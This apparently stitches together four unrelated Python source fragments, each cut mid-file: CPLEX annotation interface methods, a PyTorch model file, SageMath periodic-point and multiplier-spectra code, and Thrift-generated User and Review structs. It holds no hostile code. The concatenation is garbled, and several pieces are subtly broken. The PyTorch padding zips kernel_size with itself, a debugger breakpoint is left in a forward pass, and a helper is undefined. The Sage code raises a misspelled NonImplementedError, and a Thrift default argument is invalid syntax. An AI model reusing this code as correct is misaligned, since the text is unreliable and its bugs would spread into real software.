_proc.setlonganno(self._env._e, self._cplex._lp,
self._conv(idx), objtype, ind, val)
_aux.apply_pairs(_set_values, self._conv, *args)
def get_values(self, idx, objtype, *args):
"""Returns the long annotation values for the specified objects.
idx: the long annotation index or name.
objtype: the annotation object type.
Can be called by four forms:
long_annotations.get_values(idx, objtype)
return the values of all objects for a given annotation.
long_annotations.get_values(idx, objtype, i)
i must be a name or index. Returns the long annotation value
of the object identified by i.
long_annotations.get_values(idx, objtype, seq)
seq is a sequence of object names or indices. Returns the
long annotation values for the specified objects. Equivalent
to
[long_annotations.get_values(idx, objtype, i) for i in seq]
long_annotations.get_values(idx, objtype, begin, end)
begin and end must be object indices or object names. Returns
the long annotation values of objects with indices between
begin and end, inclusive of end. Equivalent to
long_annotations.get_values(range(begin, end + 1))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> objtype = c.long_annotations.object_type.objective
>>> c.long_annotations.set_values(idx, objtype, 0, 1)
>>> c.long_annotations.get_values(idx, objtype, 0)
1
>>> indices = c.variables.add(names=['v1', 'v2', 'v3'])
>>> objtype = c.long_annotations.object_type.variable
>>> c.long_annotations.set_values(idx, objtype,
... [(i, 1) for i in indices])
>>> c.long_annotations.get_values(idx, objtype, list(indices))
[1, 1, 1]
"""
def _get_values(begin, end=self._getnumobjtype(objtype) - 1):
return _proc.getlonganno(self._env._e, self._cplex._lp,
self._conv(idx), objtype,
begin, end)
return _aux.apply_freeform_two_args(
_get_values, self._conv, args)
class DoubleAnnotationInterface(AnnotationInterface):
"""Methods for adding, querying, and modifying double annotations."""
def __init__(self, cpx):
"""Creates a new DoubleAnnotationInterface.
The double annotation interface is exposed by the top-level
`Cplex` class as `Cplex.double_annotations`. This constructor is
not meant to be used externally.
"""
super(DoubleAnnotationInterface, self).__init__(
cplex=cpx, getindexfunc=_proc.getdblannoindex)
def get_num(self):
"""Returns the number of double annotations in the | |
<filename>model.py
import torch
import torch.nn as nn
from torch.nn import TransformerEncoder, TransformerEncoderLayer
import pdb
import math
from torch.nn import Linear, ReLU, CrossEntropyLoss, Sequential, Conv2d, MaxPool2d, Module, Softmax, BatchNorm2d, Dropout
import torch.nn.functional as F
class ConvNormRelu(nn.Module):
def __init__(self, in_channels, out_channels,
type='1d', leaky=False,
downsample=False, kernel_size=None, stride=None,
padding=None, p=0, groups=1):
super(ConvNormRelu, self).__init__()
if kernel_size is None and stride is None:
if not downsample:
kernel_size = 3
stride = 1
else:
kernel_size = 4
stride = 2
if padding is None:
if isinstance(kernel_size, int) and isinstance(stride, tuple):
padding = tuple(int((kernel_size - st)/2) for st in stride)
elif isinstance(kernel_size, tuple) and isinstance(stride, int):
padding = tuple(int((ks - stride)/2) for ks in kernel_size)
elif isinstance(kernel_size, tuple) and isinstance(stride, tuple):
assert len(kernel_size) == len(stride), 'dims in kernel_size are {} and stride are {}. They must be the same'.format(len(kernel_size), len(stride))
padding = tuple(int((ks - st)/2) for ks, st in zip(kernel_size, kernel_size))
else:
padding = int((kernel_size - stride)/2)
in_channels = in_channels*groups
out_channels = out_channels*groups
if type == '1d':
self.conv = nn.Conv1d(in_channels=in_channels, out_channels=out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
groups=groups)
self.norm = nn.BatchNorm1d(out_channels)
self.dropout = nn.Dropout(p=p)
elif type == '2d':
self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
groups=groups)
self.norm = nn.BatchNorm2d(out_channels)
self.dropout = nn.Dropout2d(p=p)
if leaky:
self.relu = nn.LeakyReLU(negative_slope=0.2)
else:
self.relu = nn.ReLU()
def forward(self, x, **kwargs):
return self.relu(self.norm(self.dropout(self.conv(x))))
class CNN(nn.Module):
def __init__(self):
super().__init__()
# Convolution 1
self.cnn1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=0)
self.relu1 = nn.ReLU()
# Max pool 1
self.maxpool1 = nn.MaxPool2d(kernel_size=2)
# Convolution 2
self.cnn2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, stride=1, padding=0)
self.relu2 = nn.ReLU()
# Max pool 2
self.maxpool2 = nn.MaxPool2d(kernel_size=2)
# Fully connected 1
self.fc1 = nn.Linear(32 * 5 * 5, 10)
def forward(self, state, desc):
# Set 1
x = state
out = self.cnn1(x)
out = self.relu1(out)
out = self.maxpool1(out)
# Set 2
out = self.cnn2(out)
out = self.relu2(out)
out = self.maxpool2(out)
#Flatten
out = out.view(out.size(0), -1)
#Dense
out = self.fc1(out)
#pdb.set_trace()
return out
class UNet1D(nn.Module):
'''
UNet model for 1D inputs
(cite: ``https://arxiv.org/pdf/1505.04597.pdf``)
Arguments
input_channels (int): input channel size
output_channels (int): output channel size (or the number of output features to be predicted)
max_depth (int, optional): depth of the UNet (default: ``5``).
kernel_size (int, optional): size of the kernel for each convolution (default: ``None``)
stride (int, optional): stride of the convolution layers (default: ``None``)
Shape
Input: :math:`(N, C_{in}, L_{in})`
Output: :math:`(N, C_{out}, L_{out})` where
.. math::
assert L_{in} >= 2^{max_depth - 1}
L_{out} = L_{in}
C_{out} = output_channels
Inputs
x (torch.Tensor): speech signal in form of a 3D Tensor
Outputs
x (torch.Tensor): input transformed to a lower frequency
latent vector
'''
def __init__(self, input_channels, output_channels, max_depth=5, kernel_size=None, stride=None, p=0, groups=1):
super(UNet1D, self).__init__()
self.pre_downsampling_conv = nn.ModuleList([])
self.conv1 = nn.ModuleList([])
self.conv2 = nn.ModuleList([])
self.upconv = nn.Upsample(scale_factor=2, mode='nearest')
self.max_depth = max_depth
self.groups = groups
## pre-downsampling
self.pre_downsampling_conv.append(ConvNormRelu(input_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
self.pre_downsampling_conv.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
for i in range(self.max_depth):
self.conv1.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=True,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
for i in range(self.max_depth):
self.conv2.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
def forward(self, x, return_bottleneck=False, return_feats=False, feats=[]):
input_size = x.shape[-1]
assert input_size/(2**(self.max_depth - 1)) >= 1, 'Input size is {}. It must be >= {}'.format(input_size, 2**(self.max_depth - 1))
#assert np.log2(input_size) == int(np.log2(input_size)), 'Input size is {}. It must be a power of 2.'.format(input_size)
assert num_powers_of_two(input_size) >= self.max_depth, 'Input size is {}. It must be a multiple of 2^(max_depth) = 2^{} = {}'.format(input_size, self.max_depth, 2**self.max_depth)
x = nn.Sequential(*self.pre_downsampling_conv)(x)
residuals = []
residuals.append(x)
for i, conv1 in enumerate(self.conv1):
x = conv1(x)
if i < self.max_depth - 1:
residuals.append(x)
bn = x
for i, conv2 in enumerate(self.conv2):
x = self.upconv(x) + residuals[self.max_depth - i - 1]
x = conv2(x)
if return_feats:
feats.append(x)
if return_feats:
return x, feats
elif return_bottleneck:
return x, bn
else:
return x
class Unit(nn.Module):
def __init__(self, in_channels, out_channels):
super(Unit, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels, kernel_size=3, out_channels=out_channels, stride=1, padding=1)
self.bn = nn.BatchNorm2d(num_features=out_channels)
self.relu = nn.ReLU()
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
output = self.relu(output)
return output
class StateEncoder(nn.Module):
def __init__(self,num_classes=1, in_channels = 3):
super().__init__()
#Create 14 layers of the unit with max pooling in between
self.unit1 = Unit(in_channels=in_channels,out_channels=32)
self.unit2 = Unit(in_channels=32, out_channels=32)
self.unit3 = Unit(in_channels=32, out_channels=32)
self.pool1 = nn.MaxPool2d(kernel_size=2)
self.unit4 = Unit(in_channels=32, out_channels=64)
self.unit5 = Unit(in_channels=64, out_channels=64)
self.unit6 = Unit(in_channels=64, out_channels=64)
self.unit7 = Unit(in_channels=64, out_channels=64)
self.pool2 = nn.MaxPool2d(kernel_size=2)
self.unit8 = Unit(in_channels=64, out_channels=128)
self.unit9 = Unit(in_channels=128, out_channels=128)
self.unit10 = Unit(in_channels=128, out_channels=128)
self.unit11 = Unit(in_channels=128, out_channels=128)
self.pool3 = nn.MaxPool2d(kernel_size=2)
self.unit12 = Unit(in_channels=128, out_channels=128)
self.unit13 = Unit(in_channels=128, out_channels=128)
self.unit14 = Unit(in_channels=128, out_channels=128)
self.avgpool = nn.AvgPool2d(kernel_size=4)
#Add all the units into the Sequential layer in exact order
self.net = nn.Sequential(self.unit1, self.unit2, self.unit3, self.pool1, self.unit4, self.unit5, self.unit6
,self.unit7, self.pool2, self.unit8, self.unit9, self.unit10, self.unit11, self.pool3,
self.unit12, self.unit13, self.unit14, self.avgpool)
self.fc = nn.Linear(in_features=512,out_features=256)
def forward(self, state):
output = self.net(state)
output = output.flatten(start_dim=1)
output = self.fc(output)
return output
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=20):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
pdb.set_trace()
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class DescEncoder_Transformer(nn.Module):
def __init__(self, ntoken = 20, ninp = 50, nhead = 2, nhid = 200, nlayers = 6, dropout=0.2):
super().__init__()
self.model_type = 'Transformer'
self.pos_encoder = PositionalEncoding(ninp, dropout)
encoder_layers = TransformerEncoderLayer(ninp, nhead, nhid, dropout)
self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers)
# self.encoder = nn.Embedding(ntoken, ninp)
self.ninp = ninp
self.decoder = nn.Linear(ninp, ntoken)
#
self.init_weights()
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
def init_weights(self):
initrange = 0.1
#self.encoder.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, src):
# src = self.encoder(src) * math.sqrt(self.ninp)
# src = self.pos_encoder(src)
output = self.transformer_encoder(src)
output = self.decoder(output)
return output
class DescEncoder(nn.Module):
'''
input_shape: (N, time, text_features: 50)
output_shape: (N, 256, time)
'''
def __init__(self, output_feats=64, input_channels=768, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(15360, 4096)
self.fc2 = nn.Linear(4096, 1024)
self.fc3 = nn.Linear(1024, 256)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.fc1(desc))
out = torch.relu(self.fc2(out))
out = torch.relu(self.fc3(out))
return out
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.i2h = nn.Linear(input_size + hidden_size, hidden_size)
self.i2o = nn.Linear(input_size + hidden_size, output_size)
self.softmax = nn.LogSoftmax(dim=1)
def forward(self, input, hidden):
combined = torch.cat((input, hidden), 1)
hidden = self.i2h(combined)
output = self.i2o(combined)
output = self.softmax(output)
return output, hidden
def initHidden(self):
return torch.zeros(1, self.hidden_size)
class DescEncoder_OneHot(nn.Module):
'''
input_shape: (N, time, text_features: 50)
output_shape: (N, 256, time)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(1000, 768)
self.bn1 = nn.BatchNorm1d(num_features=768)
self.fc2 = nn.Linear(768, 512)
self.bn2 = nn.BatchNorm1d(num_features=512)
self.fc3 = nn.Linear(512, 256)
self.bn3 = nn.BatchNorm1d(num_features=256)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.bn1(self.fc1(desc)))
out = torch.relu(self.bn2(self.fc2(out)))
out = torch.relu(self.bn3(self.fc3(out)))
return out
class DescEncoder_BOW(nn.Module):
'''
input_shape: (N, time, text_features: 50)
output_shape: (N, 256, time)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(50, 40)
self.bn1 = nn.BatchNorm1d(num_features=40)
self.fc2 = nn.Linear(40, 30)
self.bn2 = nn.BatchNorm1d(num_features=30)
self.fc3 = nn.Linear(30, 20)
self.bn3 = nn.BatchNorm1d(num_features=20)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.bn1(self.fc1(desc)))
out = torch.relu(self.bn2(self.fc2(out)))
out = torch.relu(self.bn3(self.fc3(out)))
return out
class DescEncoder_OneHot_RNN(nn.Module):
'''
input_shape: (N, time, text_features: 50)
output_shape: (N, 256, time)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
'''
input 1: (L = sequence length, N = , H = input_size)
input 2: (S = num_layers * num_directions, N, H_out = hidden_size)
>>> rnn = nn.RNN(10, 20, 2)
>>> input = torch.randn(5, 3, 10)
>>> h0 = torch.randn(2, 3, 20)
>>> output, hn = rnn(input, h0)
'''
self.n_hidden = 128
self.n_layers = 20
self.rnn = RNN(50, 32, 20)
def init_hidden(self, batch_size):
# This method generates the first hidden state of zeros which we'll use in the forward pass
# We'll send the tensor holding the hidden state to the device we specified earlier as well
hidden = torch.zeros(self.n_layers, | |
- 3*s^4 + 4*s^3 - 3*s^2 + 2*s - 1 : 1), (1 : 1 : 1),
(s^5 - 2*s^4 + 3*s^3 - 3*s^2 + 3*s - 1 : -s^5 + 3*s^4 - 5*s^3 + 4*s^2 - 4*s + 2 : 1)]
::
sage: P.<x,y,z> = ProjectiveSpace(QQ,2)
sage: H = Hom(P,P)
sage: f = H([x^2 - 21/16*z^2, y^2-2*z^2, z^2])
sage: f.periodic_points(2, False)
[(-5/4 : -1 : 1), (-5/4 : 2 : 1), (-3/4 : -1 : 1), (-3/4 : 2 : 1), (0 : 1 : 0), (1/4 : -1 : 1),
(1/4 : 2 : 1), (1 : 0 : 0), (1 : 1 : 0), (7/4 : -1 : 1), (7/4 : 2 : 1)]
::
sage: P.<x,y,z> = ProjectiveSpace(QQ,2)
sage: H = Hom(P,P)
sage: f = H([x^2 - 21/16*z^2, y^2-2*z^2, z^2])
sage: f.periodic_points(2)
[(-5/4 : -1 : 1), (-5/4 : 2 : 1), (1/4 : -1 : 1), (1/4 : 2 : 1)]
::
sage: set_verbose(None)
sage: P.<x,y> = ProjectiveSpace(ZZ, 1)
sage: H = End(P)
sage: f = H([x^2+y^2,y^2])
sage: f.periodic_points(2, R=QQbar, minimal=False)
[(-0.500000000000000? - 1.322875655532296?*I : 1),
(-0.500000000000000? + 1.322875655532296?*I : 1),
(0.500000000000000? - 0.866025403784439?*I : 1),
(0.500000000000000? + 0.866025403784439?*I : 1),
(1 : 0)]
::
sage: P.<x,y> = ProjectiveSpace(GF(307), 1)
sage: H = End(P)
sage: f = H([x^10+y^10, y^10])
sage: f.periodic_points(16, minimal=True, algorithm='cyclegraph')
[(69 : 1), (185 : 1), (120 : 1), (136 : 1), (97 : 1), (183 : 1),
(170 : 1), (105 : 1), (274 : 1), (275 : 1), (154 : 1), (156 : 1),
(87 : 1), (95 : 1), (161 : 1), (128 : 1)]
::
sage: P.<x,y> = ProjectiveSpace(GF(13^2,'t'),1)
sage: H = End(P)
sage: f = H([x^3 + 3*y^3, x^2*y])
sage: f.periodic_points(30, minimal=True, algorithm='cyclegraph')
[(t + 3 : 1), (6*t + 6 : 1), (7*t + 1 : 1), (2*t + 8 : 1),
(3*t + 4 : 1), (10*t + 12 : 1), (8*t + 10 : 1), (5*t + 11 : 1),
(7*t + 4 : 1), (4*t + 8 : 1), (9*t + 1 : 1), (2*t + 2 : 1),
(11*t + 9 : 1), (5*t + 7 : 1), (t + 10 : 1), (12*t + 4 : 1),
(7*t + 12 : 1), (6*t + 8 : 1), (11*t + 10 : 1), (10*t + 7 : 1),
(3*t + 9 : 1), (5*t + 5 : 1), (8*t + 3 : 1), (6*t + 11 : 1),
(9*t + 12 : 1), (4*t + 10 : 1), (11*t + 4 : 1), (2*t + 7 : 1),
(8*t + 12 : 1), (12*t + 11 : 1)]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([3*x^2+5*y^2,y^2])
sage: f.periodic_points(2, R=GF(3), minimal=False)
Traceback (most recent call last):
...
NotImplementedError: must be a projective morphism
"""
if n <= 0:
raise ValueError("a positive integer period must be specified")
if not self.is_endomorphism():
raise TypeError("must be an endomorphism")
if R is None:
f = self
R = self.base_ring()
else:
f = self.change_ring(R)
if not f.is_morphism():
# if not, the variety is not dimension 0 and
# can cannot construct the cyclegraph due to
#indeterminancies
raise NotImplementedError("must be a projective morphism")
PS = f.codomain()
if algorithm == 'variety':
if R in NumberFields() or R is QQbar or R in FiniteFields():
N = PS.dimension_relative() + 1
R = PS.coordinate_ring()
F = f.nth_iterate_map(n)
L = [F[i]*R.gen(j) - F[j]*R.gen(i) for i in range(0,N) for j in range(i+1, N)]
X = PS.subscheme(L)
points = X.rational_points()
if not minimal:
return points
else:
#we want only the points with minimal period n
#so we go through the list and remove any that
#have smaller period by checking the iterates
rem_indices = []
for i in range(len(points)-1,-1,-1):
# iterate points to check if minimal
P = points[i]
for j in range(1,n):
P = f(P)
if P == points[i]:
points.pop(i)
break
return points
else:
raise NotImplementedError("ring must a number field or finite field")
elif algorithm == 'cyclegraph':
if R in FiniteFields():
g = f.cyclegraph()
points = []
for cycle in g.all_simple_cycles():
m = len(cycle)-1
if minimal:
if m == n:
points = points + cycle[:-1]
else:
if n % m == 0:
points = points + cycle[:-1]
return(points)
else:
raise TypeError("ring must be finite to generate cyclegraph")
else:
raise ValueError("algorithm must be either 'variety' or 'cyclegraph'")
def multiplier_spectra(self, n, formal=True, embedding=None):
r"""
Computes the formal ``n`` multiplier spectra of this map.
This is the set of multipliers of the periodic points of formal period
``n`` included with the appropriate multiplicity.
User can also specify to compute the ``n`` multiplier spectra instead which includes the
multipliers of all periodic points of period ``n``.The map must be defined over
projective space of dimension 1 over a number field.
INPUT:
- ``n`` - a positive integer, the period.
- ``formal`` - a Boolean. True specifies to find the formal ``n`` multiplier spectra
of this map. False specifies to find the ``n`` multiplier spectra
of this map. Default: True
- ``embedding`` - embedding of the base field into `\QQbar`
OUTPUT:
- a list of `\QQbar` elements.
EXAMPLES::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([4608*x^10 - 2910096*x^9*y + 325988068*x^8*y^2 + 31825198932*x^7*y^3 - 4139806626613*x^6*y^4\
- 44439736715486*x^5*y^5 + 2317935971590902*x^4*y^6 - 15344764859590852*x^3*y^7 + 2561851642765275*x^2*y^8\
+ 113578270285012470*x*y^9 - 150049940203963800*y^10, 4608*y^10])
sage: f.multiplier_spectra(1)
[0, -7198147681176255644585/256, 848446157556848459363/19683, -3323781962860268721722583135/35184372088832,
529278480109921/256, -4290991994944936653/2097152, 1061953534167447403/19683, -3086380435599991/9,
82911372672808161930567/8192, -119820502365680843999, 3553497751559301575157261317/8192]
::
sage: set_verbose(None)
sage: z = QQ['z'].0
sage: K.<w> = NumberField(z^4 - 4*z^2 + 1,'z')
sage: P.<x,y> = ProjectiveSpace(K,1)
sage: H = End(P)
sage: f = H([x^2 - w/4*y^2, y^2])
sage: f.multiplier_spectra(2, False, embedding=K.embeddings(QQbar)[0])
[0,
5.931851652578137? + 0.?e-49*I,
0.0681483474218635? - 1.930649271699173?*I,
0.0681483474218635? + 1.930649271699173?*I]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([x^2 - 3/4*y^2, y^2])
sage: f.multiplier_spectra(2)
[1]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([x^2 - 7/4*y^2, y^2])
sage: f.multiplier_spectra(3)
[1, 1]
"""
PS = self.domain()
n = Integer(n)
if (n < 1):
raise ValueError("period must be a positive integer")
from sage.schemes.projective.projective_space import is_ProjectiveSpace
if not is_ProjectiveSpace(PS):
raise NotImplementedError("not implemented for subschemes")
if (PS.dimension_relative() > 1):
raise NonImplementedError("only implemented for dimension 1")
if not self.is_endomorphism():
raise TypeError("self must be an endomorphism")
if not PS.base_ring() in NumberFields() and not PS.base_ring() is QQbar:
raise NotImplementedError("self must be a map over a number field")
if embedding is None:
f = self.change_ring(QQbar)
else:
f = self.change_ring(embedding)
PS = f.domain()
if not formal:
G = f.nth_iterate_map(n)
F = G[0]*PS.gens()[1] - G[1]*PS.gens()[0]
else:
# periodic points of formal period n are the roots of the nth dynatomic polynomial
K = f._number_field_from_algebraics()
F = K.dynatomic_polynomial(n)
if K.domain().base_ring() != QQ: # need to coerce F to poly over QQbar. This is only needed if base ring is not QQ
abspoly = K.domain().base_ring().absolute_polynomial()
phi = K.domain().base_ring().hom(QQbar.polynomial_root(abspoly,abspoly.any_root(CIF)),QQbar)
Kx = K.coordinate_ring()
QQbarx = QQbar[Kx.variable_names()]
phix = Kx.hom(phi,QQbarx)
F = phix(F)
other_roots = F([(f.domain().gens()[0]),1]).univariate_polynomial().roots(ring=QQbar)
points = []
minfty = min([e[1] for e in F.exponents()]) # include the point at infinity with the right multiplicity
for i in range(minfty):
points.append(PS([1,0]))
for R in other_roots:
for i in range(R[1]):
points.append(PS([R[0],1])) # include copies of higher multiplicity roots
newpoints = [] # should include one representative point per cycle, included with the right multiplicity
while(points != []):
P = points[0]
newpoints.append(P)
points.pop(0)
Q = P
for i in range(1,n):
try:
points.remove(f(Q))
except ValueError:
pass
Q = f(Q)
multipliers = [f.multiplier(P,n)[0,0] for P in newpoints]
return multipliers
def sigma_invariants(self, n, formal=True, embedding=None):
r"""
Computes the values of the elementary symmetric polynomials of the formal ``n`` multilpier spectra
of this map.
Can specify to instead compute the values corresponding to the elementary symmetric
polynomials of the ``n`` multiplier spectra, which includes the multipliers of all periodic
points of period ``n``. The map must be defined over projective space | |
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
from thrift.transport import TTransport
all_structs = []
class ErrorCode(object):
SE_THRIFT_CONNPOOL_TIMEOUT = 0
SE_THRIFT_CONN_ERROR = 1
SE_UNAUTHORIZED = 2
SE_MEMCACHED_ERROR = 3
SE_MONGODB_ERROR = 4
SE_REDIS_ERROR = 5
SE_THRIFT_HANDLER_ERROR = 6
_VALUES_TO_NAMES = {
0: "SE_THRIFT_CONNPOOL_TIMEOUT",
1: "SE_THRIFT_CONN_ERROR",
2: "SE_UNAUTHORIZED",
3: "SE_MEMCACHED_ERROR",
4: "SE_MONGODB_ERROR",
5: "SE_REDIS_ERROR",
6: "SE_THRIFT_HANDLER_ERROR",
}
_NAMES_TO_VALUES = {
"SE_THRIFT_CONNPOOL_TIMEOUT": 0,
"SE_THRIFT_CONN_ERROR": 1,
"SE_UNAUTHORIZED": 2,
"SE_MEMCACHED_ERROR": 3,
"SE_MONGODB_ERROR": 4,
"SE_REDIS_ERROR": 5,
"SE_THRIFT_HANDLER_ERROR": 6,
}
class User(object):
"""
Attributes:
- user_id
- first_name
- last_name
- username
- password
- salt
"""
def __init__(self, user_id=None, first_name=None, last_name=None, username=None, password=<PASSWORD>, salt=None,):
self.user_id = user_id
self.first_name = first_name
self.last_name = last_name
self.username = username
self.password = password
self.salt = salt
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.user_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.first_name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.last_name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.username = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.password = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.salt = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('User')
if self.user_id is not None:
oprot.writeFieldBegin('user_id', TType.I64, 1)
oprot.writeI64(self.user_id)
oprot.writeFieldEnd()
if self.first_name is not None:
oprot.writeFieldBegin('first_name', TType.STRING, 2)
oprot.writeString(self.first_name.encode('utf-8') if sys.version_info[0] == 2 else self.first_name)
oprot.writeFieldEnd()
if self.last_name is not None:
oprot.writeFieldBegin('last_name', TType.STRING, 3)
oprot.writeString(self.last_name.encode('utf-8') if sys.version_info[0] == 2 else self.last_name)
oprot.writeFieldEnd()
if self.username is not None:
oprot.writeFieldBegin('username', TType.STRING, 4)
oprot.writeString(self.username.encode('utf-8') if sys.version_info[0] == 2 else self.username)
oprot.writeFieldEnd()
if self.password is not None:
oprot.writeFieldBegin('password', TType.STRING, 5)
oprot.writeString(self.password.encode('utf-8') if sys.version_info[0] == 2 else self.password)
oprot.writeFieldEnd()
if self.salt is not None:
oprot.writeFieldBegin('salt', TType.STRING, 6)
oprot.writeString(self.salt.encode('utf-8') if sys.version_info[0] == 2 else self.salt)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Review(object):
"""
Attributes:
- review_id
- user_id
- req_id
- text
- movie_id
- rating
- timestamp
"""
def __init__(self, review_id=None, user_id=None, req_id=None, text=None, movie_id=None, rating=None, timestamp=None,):
self.review_id = review_id
self.user_id = user_id
self.req_id = req_id
self.text = text
self.movie_id = movie_id
self.rating = rating
self.timestamp = timestamp
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.review_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.user_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.req_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.text = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.movie_id = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.rating = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.timestamp = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('Review')
if self.review_id is not None:
oprot.writeFieldBegin('review_id', TType.I64, 1)
oprot.writeI64(self.review_id)
oprot.writeFieldEnd()
if self.user_id is not None:
oprot.writeFieldBegin('user_id', TType.I64, 2)
oprot.writeI64(self.user_id)
oprot.writeFieldEnd()
if self.req_id is not None:
oprot.writeFieldBegin('req_id', TType.I64, 3)
oprot.writeI64(self.req_id)
oprot.writeFieldEnd()
if self.text is not None:
oprot.writeFieldBegin('text', TType.STRING, 4)
oprot.writeString(self.text.encode('utf-8') if sys.version_info[0] == 2 else self.text)
oprot.writeFieldEnd()
if self.movie_id is not None:
oprot.writeFieldBegin('movie_id', TType.STRING, 5)
oprot.writeString(self.movie_id.encode('utf-8') if sys.version_info[0] == 2 else self.movie_id)
oprot.writeFieldEnd()
if self.rating is not None:
oprot.writeFieldBegin('rating', TType.I32, 6)
oprot.writeI32(self.rating)
oprot.writeFieldEnd()
